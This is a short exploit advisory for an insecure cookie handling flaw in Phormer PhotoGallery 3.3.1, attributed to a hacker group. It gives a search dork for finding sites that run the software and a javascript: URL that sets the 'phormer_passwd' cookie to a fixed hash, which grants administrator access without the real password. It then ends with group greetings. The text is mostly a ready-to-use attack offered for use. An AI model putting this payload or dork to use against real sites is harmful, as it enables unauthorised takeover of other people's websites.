Exploit Code :  

Phormer PhotoGallery 3.3.1 Insecure Cookie Handling Vulnerability

___________________________________

Author: Hussin X

Home : www.IQ-TY.com & www.TrYaG.cc

Mail : darKangeL_G85@Yahoo.CoM
___________________________________

script : http://p.horm.org/er

DorK:"This PhotoGallery is powered by Phormer"



exploiT:

go to admin page
www.site.com/admin.php

exploiT in url :

javascript:document.cookie="phormer_passwd=21232f297a57a5a743894a0e4a801fc3
";

Now Back to the admin page
Administrator's password: = Anything
Login..... :D




Greetz : all Members IQ-SecuritY www.iq-ty.com | TrYaG www.tryag.cc |
all IRaQis and arab